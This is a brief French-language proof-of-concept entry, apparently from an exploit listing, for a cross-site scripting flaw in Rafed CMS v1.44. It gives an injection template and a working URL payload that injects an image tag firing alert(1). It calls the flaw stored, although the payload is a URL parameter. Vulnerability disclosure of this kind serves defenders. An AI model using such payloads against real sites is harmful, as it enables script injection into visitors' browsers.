
Exploit de preuve de concept pour une vulnérabilité XSS stockée dans Rafed CMS v1.44, démontrant l'injection via le paramètre index.php.
Rafed CMS Website v1.44 - Cross-Site Scripting (XSS)
index.php?">{XSS_Payload] dans index.php
https://localhost/?%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E